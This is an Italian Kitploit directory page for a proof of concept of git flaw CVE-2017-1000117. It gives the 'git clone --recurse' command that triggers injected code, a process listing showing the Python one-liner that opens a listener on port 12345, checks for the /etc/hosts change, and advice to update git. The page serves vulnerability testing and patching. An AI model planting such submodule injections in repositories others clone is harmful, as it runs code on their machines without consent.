Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-1000117-test — Verifica di CVE-2017-1000117 | Kitploit
Strumenti/GitHubGitHub/shadow5523/cve-2017-1000117-test
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingRed Teaming
GitHubshadow5523/cve-2017-1000117-test

CVE-2017-1000117-test

Verifica di CVE-2017-1000117

Vedi Repository
9 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Descrizione del funzionamento

Questo sfrutta la vulnerabilità CVE-2017-1000117. Quando si clona questo repository con il comando git con l'opzione --recurse con privilegi di root, viene avviato automaticamente un server http in ascolto sulla porta 12345.
Per fermare il server http, trova il numero del processo e killalo.

Sistemi operativi testati

CentOS7
macOS Sierra
Debian8

Comando per l'esecuzione

Esegui il comando seguente. Al termine, la console si bloccherà, quindi premi Ctrl + C per uscire.

root@kitploit:~
    [root@localhost ~]$ git clone --recurse https://github.com/Shadow5523/CVE-2017-1000117-test.git

Metodo di verifica della vulnerabilità

  1. Esegui il comando PS per verificare se il codice Python è in esecuzione.
root@kitploit:~
    [root@localhost ~]$ ps ax | grep http
    21365 pts/0    S      0:00 python -c (lambda j: (lambda s, i: s.setsockopt(i.SOL_SOCKET, i.SO_REUSEADDR, 1) or s.bind((i.gethostname(), 12345)) or s.listen(10) or map(lambda y: y.send("HTTP/1.0 200 OK\r\nContent-Length: 20\r\nContent-Type: text/html\r\n\r\n<html><center>test</center></html>"), (s.accept()[0] for x in iter(int, 1))))(j.socket(j.AF_INET, j.SOCK_STREAM), j))(__import__("socket"))
    21381 pts/0    S+     0:00 grep --color=auto ht

Scarica lo strumento
  1. Verifica con netstat che la porta 12345 sia in ascolto.
root@kitploit:~
    [root@localhost ~]$ netstat -tanp | grep 12345
    tcp        0      0 127.0.0.1:12345         0.0.0.0:*               LISTEN      21365/python

Su macOS verifica con il comando seguente.

root@kitploit:~
    MAcbook:~ root# lsof -nP -iTCP -sTCP:LISTEN
    COMMAND   PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
    Python  14231 root    3u  IPv4 0xa3955f2183c66251      0t0  TCP 127.0.0.1:12345 (LISTEN)
  1. Verifica se nell'ultima riga di /etc/hosts è stato aggiunto "127.0.0.1 nome_host".

Contromisure

Aggiorna git all'ultima versione. Fare riferimento al link seguente.
Come aggiornare all'ultimo Git da un repository remoto di GitHub